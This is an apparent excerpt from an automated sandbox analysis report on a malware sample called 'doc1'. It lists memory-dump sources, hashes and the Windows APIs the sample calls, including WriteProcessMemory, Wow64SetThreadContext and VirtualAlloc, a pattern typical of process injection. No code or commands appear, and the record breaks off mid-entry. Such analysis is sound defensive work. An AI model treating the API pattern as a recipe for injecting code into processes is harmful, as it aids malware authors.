                            • Instruction ID: 933b1da7962962d09df4295bc45f0c681bf335d2b8d5cf43185d079b554d4d67
                            • Opcode Fuzzy Hash: ef1519291ed8351a626ff5191386acbfe02a7db2940a471200d19821c74dddb7
                            • Instruction Fuzzy Hash: 1A41A9B5D052589FDB10CFAAD885AAEBBF1BF49310F24802AE419B7240D738A945CF64
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 057FCD77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 4c6bb5340260f0a5b6e8ceea8919d6412da617cdd37c21e43ea4ba34dec1971d
                            • Instruction ID: 0b26c8a38b8197fb0b98ab1c3d288fc5de4a6972a6a94bf89ef39941f136c84d
                            • Opcode Fuzzy Hash: 4c6bb5340260f0a5b6e8ceea8919d6412da617cdd37c21e43ea4ba34dec1971d
                            • Instruction Fuzzy Hash: 6B31A8B5D052589FDB10CFAAD885AAEBBF5BF49310F24802AE419B7240C738A945CF64
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: d
                            • API String ID: 0-2564639436
                            • Opcode ID: dc00869fd427bcecac5f58e42737e08cfdca3c549584840e95b8dab497f792e9
                            • Instruction ID: 586bb54528463db3ffefbbc1c1b51e0c0c342018935aae59470b32078b448330
                            • Opcode Fuzzy Hash: dc00869fd427bcecac5f58e42737e08cfdca3c549584840e95b8dab497f792e9
                            • Instruction Fuzzy Hash: 86D17A30600715CFCB25CF29D484D6ABBF2FF88324B55CA69E55A9B252DB30F846DB90
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: e7ac030e2c2fdcd2e4761717b75f48223a0ad26b4bcf4f5ec5b88a18fab64cf2
                            • Instruction ID: 0c255e383371a4e37cd2c4649c35f4ed4850856e1ff58c291e2f25197b41151b
                            • Opcode Fuzzy Hash: e7ac030e2c2fdcd2e4761717b75f48223a0ad26b4bcf4f5ec5b88a18fab64cf2
                            • Instruction Fuzzy Hash: 3831DBB4D012189FDB10CFA9D881AAEFBF1BB49310F10802AE914B7300C735A945CFA4
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057FD45B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            APIs
                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0580E6F7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: fdc524785e935e74f89cb9c9c5d47fe50e75f7b914b7c5a647127cc59a0e9922
                            • Instruction ID: 5dafb5136e0574fb4482f8b48773dee59dfcb665ec88611728806b621c05518a
                            • Opcode Fuzzy Hash: fdc524785e935e74f89cb9c9c5d47fe50e75f7b914b7c5a647127cc59a0e9922
                            • Instruction Fuzzy Hash: A2110370E15219CFEB24DF29D891BADB7B2FB89300F0494AAC40AB7295DB705D80CF00
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 22aa99a611475a3352d6de89532b6522e9cdd426cc7189f3071818a2ef528171
                            • Instruction ID: b6170c4d7ac4f5c2c2e85672666ded5771deb0895230d8b31e7d7b00ca887211
                            • Opcode Fuzzy Hash: 22aa99a611475a3352d6de89532b6522e9cdd426cc7189f3071818a2ef528171
                            • Instruction Fuzzy Hash: 5E217274A056298FDBA4DF28D888BAAB7B1BB49311F1054E6D419A7794DB309EC4CF01
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 0bd359313d8adc6b163d6fd626cf7f5941f3131c4aa0004e9decad402c161f77
                            • Instruction ID: 787a24920a934151cd9b11a987cd6d44c1cb4aa4973c8b5537b3809410efee7f
                            • Opcode Fuzzy Hash: 0bd359313d8adc6b163d6fd626cf7f5941f3131c4aa0004e9decad402c161f77
                            • Instruction Fuzzy Hash: 9811C2B4901218CFDB68CF28C889BE8B7F2BB84305F1084A9D80DA7291D7745EC6CF44
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @U
                            • API String ID: 0-372357663
                            • Opcode ID: aa7eb4267fef853a8e2d3f932170f0488017c9a16e507774130abe7d17fcc157
                            • Instruction ID: 6d20dfd9e728fdc0186fa5c6694f1f5a1ad1e7dd4d10379ade18054b65e93378
                            • Opcode Fuzzy Hash: aa7eb4267fef853a8e2d3f932170f0488017c9a16e507774130abe7d17fcc157
                            • Instruction Fuzzy Hash: 56F0B430240308CFC746EF78E450A687BE9EBCA390B1491A8E1459B2A6EA24DD458B91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5d06269c80999492d24c9e155b87cd106024dffeca14298d2daed7b77c85cca4
                            • Instruction ID: 83cbdc4b387d1ff856b7008f6b072c8782b5d25024eaf35486ebd5d6d665a41c
                            • Opcode Fuzzy Hash: 5d06269c80999492d24c9e155b87cd106024dffeca14298d2daed7b77c85cca4
                            • Instruction Fuzzy Hash: 3AF0C970D05219CFEB64CF65D844BA8B7B6FB85304F10C0A6D949E7298DB744E85CF54
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: +
                            • API String ID: 0-2126386893
                            • Opcode ID: 7e0d35d54d6db512a837f7f19b5dbfbc01308134aecbb6cf601d69d1f4c45309
                            • Instruction ID: 06737bad08364d88775692a654f45ed9202ac1a98eb1e319658096e9152211fa
                            • Opcode Fuzzy Hash: 7e0d35d54d6db512a837f7f19b5dbfbc01308134aecbb6cf601d69d1f4c45309
                            • Instruction Fuzzy Hash: 16019DB49062299FDBA4DF24DD54BDDBBB1AB49300F0080E9E989B7290DA705ED0CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: e18095f210565ce00713df631b7c80d0c60316df6c1df04062c465c5163a3cad
                            • Instruction ID: 4492e53593c4d37a5c665076b7afd9c354bec81e72e5728540630dd370295e32
                            • Opcode Fuzzy Hash: e18095f210565ce00713df631b7c80d0c60316df6c1df04062c465c5163a3cad
                            • Instruction Fuzzy Hash: 44011974A00208CFCB20DF29E4857DDB7B2EB8A310F1090A5E44AA3285CB305DC58F82
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 6ff6cd44c5b3ba1118cffda6bc2b9dea652f583ec07fcf0f2f4a5c0412ad393e
                            • Instruction ID: 13ad9bfdfab21a5d04e7263ef5a04e0bacaef9ff4f04ca2c9c9e92e5320d9b69
                            • Opcode Fuzzy Hash: 6ff6cd44c5b3ba1118cffda6bc2b9dea652f583ec07fcf0f2f4a5c0412ad393e
                            • Instruction Fuzzy Hash: 4CF0B77694021DDFEF20CF50CD41FD9B7B9BB08304F1081DAA519A7281D6319B85DF14
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 429283e4d3a256950856dd938b44876c23230da10849b6159bf08da82a2492b3
                            • Instruction ID: 91e06d2d9600505c5f5fa47dd671796ba573a03505f8526f7a9371e3a22eaae7
                            • Opcode Fuzzy Hash: 429283e4d3a256950856dd938b44876c23230da10849b6159bf08da82a2492b3
                            • Instruction Fuzzy Hash: FAF03774A14208CFDB64DF24D486BEDBBB2FB48310F1044A9E909A3285CB705EC0CF42
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: f4d62540d071bc010b0a60657c805f663afc57a16406a2fe5fb954e644f7fdc8
                            • Instruction ID: a4b929151b17b98bf21ec3da43f869c77b58663c3a3f9041359b75011a5c35ba
                            • Opcode Fuzzy Hash: f4d62540d071bc010b0a60657c805f663afc57a16406a2fe5fb954e644f7fdc8
                            • Instruction Fuzzy Hash: 54F04974A11208CFDB24DF68D494B9C77F1FB49310F1040A5E509A7384C7319E80CF52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: c0609da3ce631428afc245951884e6f1ff8dead06d5c5a51c3adce78fec8e748
                            • Instruction ID: c5c9edc026df137097b905b4d48af4ec7d93a65e42bde670d823e4a5ffdb41e8
                            • Opcode Fuzzy Hash: c0609da3ce631428afc245951884e6f1ff8dead06d5c5a51c3adce78fec8e748
                            • Instruction Fuzzy Hash: 09F03774A01208DFDB20DF64D5957ED77B2EB84310F1000A9E509A7391C7356EC4CF02
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: b5c4ea5abb44e048de8c9746a062bd5bcba3867ffc464ed8f9fd655b2ce0175e
                            • Instruction ID: 12e004cad619d6b6ace0da4a46745579b13c941f3a0beb02684c019daa9c1c36
                            • Opcode Fuzzy Hash: b5c4ea5abb44e048de8c9746a062bd5bcba3867ffc464ed8f9fd655b2ce0175e
                            • Instruction Fuzzy Hash: 3EF0B278A04248CFDBA0DF54E895BADBBB6EB85311F2050A5E409B7394CB3169C5CF42
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: a6d8be296be70e8512739d4b9a8e221e6aa56d8c9133744a736212c12e32cc67
                            • Instruction ID: 278a9024831784f71f47acb0c84fa6d52b9a19b008fba14638e880d2689b5831
                            • Opcode Fuzzy Hash: a6d8be296be70e8512739d4b9a8e221e6aa56d8c9133744a736212c12e32cc67
                            • Instruction Fuzzy Hash: A7F01474A00208CFEB20DF58E894B9DBBB5FB89310F2040A9E809A7285C7309980CF52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 4b39d32372c8e6d654a629287e3c080ce15bb99429240e6d2305dbdb01fa9c28
                            • Instruction ID: e856661f67fd8bb20ccbe2b1bb2e20586535149324fe7d6453bba4868e1e44e8
                            • Opcode Fuzzy Hash: 4b39d32372c8e6d654a629287e3c080ce15bb99429240e6d2305dbdb01fa9c28
                            • Instruction Fuzzy Hash: 08F03A70905119CFEB64CF66D840BA8BBB6FB88300F10C0E6D949E3298DB304E80CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: +
                            • API String ID: 0-2126386893
                            • Opcode ID: 9c0115eaf1c0de2737f43be7de51e201807cf33ef8a69f5a8c922e3fa9241d3a
                            • Instruction ID: 0cdaf5db22dc32b1f4db74c7063e1f7c089183739a2338af8ce2293906d3316c
                            • Opcode Fuzzy Hash: 9c0115eaf1c0de2737f43be7de51e201807cf33ef8a69f5a8c922e3fa9241d3a
                            • Instruction Fuzzy Hash: CFF05F749022289FDB60DF64DD44BDDBBB1BB09300F0080D9E949B3250D6355E90CF44
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: )
                            • API String ID: 0-2427484129
                            • Opcode ID: 4516f4ba2533fe9632ee08c0853abe55e4214be492807f8b5f85f62e096e2b2e
                            • Instruction ID: f16bd78fff3c54f88edb7b4ad90799bb8ae0b85a0716d6fa4ba1fac639028129
                            • Opcode Fuzzy Hash: 4516f4ba2533fe9632ee08c0853abe55e4214be492807f8b5f85f62e096e2b2e
                            • Instruction Fuzzy Hash: 7FF07474A012198FDB54DF65D894A9DB7B5AB85300F50849AC40DA7341DA31AE85CF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: d3ceb496be4ea6469dbeb7fde089fce6a0e85bdcc5fa62d1375db37ad1322d12
                            • Instruction ID: f0ded5fcbfe9b1c975519803170863d5af375e3f637efc2e3ae316058329bc7c
                            • Opcode Fuzzy Hash: d3ceb496be4ea6469dbeb7fde089fce6a0e85bdcc5fa62d1375db37ad1322d12
                            • Instruction Fuzzy Hash: 0AF09874A0025DCFDB64DFA8D894BDEB7B2EB85310F2091969809B7348DA305EC5CF61
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 688fc11c6d436fd64b22f1cb02407787b07d9bc37d7074b2955eb6db3ecb0fba
                            • Instruction ID: 549e5b8a64a9107afdd03cdbbe365842b9655ce8451f3db96313795e96b8adb3
                            • Opcode Fuzzy Hash: 688fc11c6d436fd64b22f1cb02407787b07d9bc37d7074b2955eb6db3ecb0fba
                            • Instruction Fuzzy Hash: F0F01C74A01218CFDB64EF64D85478AB7B2FB84300F1065AAD419B7388DB314DC5CF51
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 883281b83883d8b291accb3a3074078a1b3602c3cad4d0b9964cc0d7ed3f16ca
                            • Instruction ID: 272d595625efd65428748c53e5535cb3057716ab66cfdb61fca316a36c39b31d
                            • Opcode Fuzzy Hash: 883281b83883d8b291accb3a3074078a1b3602c3cad4d0b9964cc0d7ed3f16ca
                            • Instruction Fuzzy Hash: 7AE0127490411D9FCB24DF64C855BDE7BFDFB49300F0041969A19E7385DA354A85DFA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 6c571916020a1973b292d87c652b2dc39bc30dca1e210a08f969b65e4e4656b9
                            • Instruction ID: cde31a80d424f66b23ff022b39eeab0d818fae07b2d92cb92861392e1d5d87d3
                            • Opcode Fuzzy Hash: 6c571916020a1973b292d87c652b2dc39bc30dca1e210a08f969b65e4e4656b9
                            • Instruction Fuzzy Hash: EAE0E5B4A01218CFCB20DF24D8997D9B772EF8A305F10909A940AA7294CB719989CF81
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: )
                            • API String ID: 0-2427484129
                            • Opcode ID: 8fe97c96fdb1e52d9ffa327be56f32d57c2d1a4ebd3de37fd3b117a1bf07d18b
                            • Instruction ID: 786615bc703b825bf94241e4f093f3124db1a894631516943936de5e2bf5908b
                            • Opcode Fuzzy Hash: 8fe97c96fdb1e52d9ffa327be56f32d57c2d1a4ebd3de37fd3b117a1bf07d18b
                            • Instruction Fuzzy Hash: CEE09278A0031CCFCB50CF54D898A99B7B9AB89305F14869AC81AE7351D731EE8ACF40
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5eaf8906a7428e27dbf190aa8e37bc042ed93bb28a41f9a33ccd2f5fd9c382b0
                            • Instruction ID: c6c5cdf4ecce7b938b5765d63e16a54409c4c87b2bc4796fead08f8be0bfec0b
                            • Opcode Fuzzy Hash: 5eaf8906a7428e27dbf190aa8e37bc042ed93bb28a41f9a33ccd2f5fd9c382b0
                            • Instruction Fuzzy Hash: CDE04F308053188BDB20CFA0C4043ED7BB9EB86304F108095C945A72C4C7B909C9CF40
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 6e41939669b831b9cf5b8bc45a52938269e76e1bed50ac6864da38335f98b7b9
                            • Instruction ID: 4382a26617f276c7bb6fe57bec2b5a5b97c9ff635e280f13065f3635920f7ba2
                            • Opcode Fuzzy Hash: 6e41939669b831b9cf5b8bc45a52938269e76e1bed50ac6864da38335f98b7b9
                            • Instruction Fuzzy Hash: 29E0EC34501208AFCF15DFD4C900E9D7B7BEB89314F109110ED166B298C7354D95DB84
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 72463c3bbba873fe20e7633a9558a7c1c7ffdba102ad32425f7e03d0363e1c97
                            • Instruction ID: 001476c964762dc8e8d5c0071af2a3d3e7ada76b2e3392763c2edcd3fae661d5
                            • Opcode Fuzzy Hash: 72463c3bbba873fe20e7633a9558a7c1c7ffdba102ad32425f7e03d0363e1c97
                            • Instruction Fuzzy Hash: 06E04F34A001188FC728DF20D9567EDB7B2EB85701F1094A9D50AB33D4CB301E84CF62
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 598edfd20ceed3a9f77391d7a1dbac2d222600763a1efb01acaf3bb447ba9d6c
                            • Instruction ID: 7766d5951995945cad5715f672bbe5f8ac67fef1b1a9dd05f256128fcd0ea292
                            • Opcode Fuzzy Hash: 598edfd20ceed3a9f77391d7a1dbac2d222600763a1efb01acaf3bb447ba9d6c
                            • Instruction Fuzzy Hash: 64E01A30A08218CFC764DFA0D8997E9B7B2EB89301F1050AAD49AB7384CB701EC5CF11
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 957f5dcf88056bd4eb0d68ce66e7bc6a0430b063d6bb96f0e3ec62dbcd7e3248
                            • Instruction ID: c086338a8645a9bb82e49e6e273e6768a0b2051191a07851415a32a35330cb72
                            • Opcode Fuzzy Hash: 957f5dcf88056bd4eb0d68ce66e7bc6a0430b063d6bb96f0e3ec62dbcd7e3248
                            • Instruction Fuzzy Hash: 23E01A34A05218CFDB24DF60D855B9DB7B6EB89310F2098A9940AB3294CB325EC58F52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 204a44cb9d78638a872ec6331b5f52e58afe6becc37df666a1215caceaf565bd
                            • Instruction ID: f30cab24eaefb9dc7d9f300efdb5bb40db87b76b7ef1c2641d268cb9b11b3e7e
                            • Opcode Fuzzy Hash: 204a44cb9d78638a872ec6331b5f52e58afe6becc37df666a1215caceaf565bd
                            • Instruction Fuzzy Hash: 49E01A74A021188FD764DF20DC95B9DB7B2EB85300F1090A9D009B7384CB301EC9CF16
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5180fe163a0bf7891a1b3d0382e14221413b0d35d88de6e6585554366d3a373c
                            • Instruction ID: e660c31da51ee446068bc1a696a08843cc8083e2e71d26b55c08f81c346177ec
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e47f35e59bab65efd88dabafa28e5f5b407e629aa8068cc4461a836c57099bf2
                            • Instruction ID: d47ed1cfc27751100c8d8c3aa3ea4fa55d86b2a8c3e8ace47cb7ddc1abd67a3f
                            • Opcode Fuzzy Hash: e47f35e59bab65efd88dabafa28e5f5b407e629aa8068cc4461a836c57099bf2
                            • Instruction Fuzzy Hash: 92417135A043089FCB24DF64D854AEE7BB2FF8D350F208069E805AB2A5CB359D15DBA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6d33315af2e27aec18ad2d8e8b01fb6b27ae2efe216bfc856705b3571cbde41
                            • Instruction ID: e02687dcdcf66aa85510ee602e69caa7babd34762b3f1944762940a74199ac6f
                            • Opcode Fuzzy Hash: e6d33315af2e27aec18ad2d8e8b01fb6b27ae2efe216bfc856705b3571cbde41
                            • Instruction Fuzzy Hash: 0A41A5B4D01208DFDB18DFB9D594A9DBBF2BF89310F648129E815AB360DB319982DF50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f883c2e190c0fa1a22a6576a5e02382977a8dc239bbc1bd31b682e83c411ca0e
                            • Instruction ID: fdfa7453252d77613ec4115178bf148a3f62471d2cec79258e78daddb95f1b68
                            • Opcode Fuzzy Hash: f883c2e190c0fa1a22a6576a5e02382977a8dc239bbc1bd31b682e83c411ca0e
                            • Instruction Fuzzy Hash: F131D536A101049FCB05DF58D888EA9BBB2FF48320B1680A8E5099B372D731ED56DB40
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6570296d159575f6f947e72aefeed2f034de52758aa112abfcebca57d7a140d9
                            • Instruction ID: eb48fd95facad4d8f8778a71bc6afa1507327dfb206404bf29c86c37f75c2ac4
                            • Opcode Fuzzy Hash: 6570296d159575f6f947e72aefeed2f034de52758aa112abfcebca57d7a140d9
                            • Instruction Fuzzy Hash: A231B435710244AFCF199F94C854D69BFB7FF8D320B0584A9E9069B361DA31DC02DBA1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
